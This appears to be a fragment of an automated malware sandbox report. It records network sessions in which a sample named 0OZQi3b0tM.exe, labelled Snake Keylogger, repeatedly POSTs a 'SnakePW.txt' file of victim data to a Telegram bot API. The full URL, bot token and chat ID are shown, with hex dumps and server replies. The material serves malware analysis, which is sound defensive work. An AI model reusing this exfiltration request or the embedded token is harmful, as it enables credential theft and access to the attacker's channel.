                                                                    2022-06-26 07:34:42 UTC486OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 39 35 30 64 61 61 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571950daa0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:42 UTC487INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:42 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:42 UTC487INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67075,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228882,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    289192.168.2.550223149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:42 UTC488OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757198a1331
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:42 UTC488OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 39 38 61 31 33 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757198a1331Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:42 UTC488INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:42 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:42 UTC489INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67076,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228882,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    29192.168.2.549798149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:50 UTC48OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756db6275f7
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:50 UTC49OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 62 36 32 37 35 66 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756db6275f7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:50 UTC49INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:50 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:50 UTC50INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66776,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228770,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    290192.168.2.550224149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:42 UTC489OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575719c5ae32
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:42 UTC490OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 39 63 35 61 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575719c5ae32Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:43 UTC490INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:43 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:43 UTC490INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67077,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228883,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    291192.168.2.550225149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:43 UTC491OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571a014885
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:43 UTC491OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 61 30 31 34 38 38 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571a014885Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:43 UTC492INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:43 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:43 UTC492INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67078,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228883,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    292192.168.2.550226149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:43 UTC493OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571a3ce36e
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:43 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 61 33 63 65 33 36 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571a3ce36eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:43 UTC493INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:43 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:43 UTC494INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67079,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228883,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    293192.168.2.550227149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:44 UTC494OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571a787e1f
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:44 UTC495OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 61 37 38 37 65 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571a787e1fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:44 UTC495INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:44 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:44 UTC495INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67080,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228884,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    294192.168.2.550228149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:44 UTC496OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571ab1b686
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
